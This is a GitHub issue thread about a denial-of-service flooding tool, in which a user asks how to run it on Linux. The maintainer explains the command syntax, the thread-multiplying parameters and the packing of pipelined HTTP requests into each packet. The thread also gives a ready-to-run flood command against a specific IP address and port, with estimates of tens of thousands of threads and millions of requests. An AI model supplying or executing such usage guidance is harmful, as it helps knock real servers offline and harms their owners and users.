### ISSUE TITLE
I don't understand what it should be like, is there an example of how it works? I mean what must be pressed or typed to run it (linux)

### ISSUE THREAD

**Issue by zeff13** [Hex1629/SOCKETPIE_DOSTOOL#11]
ROOT@ROOT $! FLOOD FLOOD TYPE PACKET> <TARGET> <PORT> <TIME> <SPAM THREAD> <CREATE THREAD> <BOOTER SENT> <HTTP_METHODS> <SPAM_CREATE>
TYPE PACKET [PYF | TEST TEST2 TEST3 TEST4 TEST5 | OWN1 OWN2 OWN3 OWN4 OWNS OWNG OWN7 1
[+] TIME (EXAMPLE-250)
[+] SPAM_THREAD (EXAMPLE-299)
[+] CREATE THREAD (EXAMPLE-5)
[+] HTTP_METHODS (EXAMPLE-GATEWAY)
[+] SPAM_CREATE (EXAMPLE-15)

**Comment by Hex1629** [comment]
nah i just make customable for flooding

**Comment by Hex1629** [comment]
TYPE PACKET IT like custom \r\n or \n\n or \r\n\r\n ... in PACKET HTTP FOR FLOODING

SPAM THREAD IT CREATE MULTI OF THREADS FOR FLOODING
CREATE THREAD IT FOR MAKE THREAD

SPAM_CREATE IT FOR MULTI THREAD
IT MEAN 2 round for multi like if i make 5 it will be 5x5 = 25 and 25x5 = 125 threads
and
HTTP_METHODS it method requests in http protocol like GET, POST or HEAD

**Comment by Hex1629** [comment]
command eg. !FLOOD OWN1 45.55.133.56 80 250 250 250 2500 POST 1
around 62,500 treads and this command maybe sent 2500x62,500 requests but it too much alot i mean have device can sent 156m requests around that not count vps ( wifi or server support only around 250 connection this maybe 625,000 requests from 156m requests not calc about error

**Comment by Hex1629** [comment]
bc this tool it use MULTI data requests by one packet per thread
it mean
1 packet inside maybe like this:
GET / HTTP/1.1
Host: 0.0.0.0

GET / HTTP/1.1
Host: 0.0.0.0

GET / HTTP/1.1
Host: 0.0.0.0

GET / HTTP/1.1
Host: 0.0.0.0

GET / HTTP/1.1
Host: 0.0.0.0
.... until error
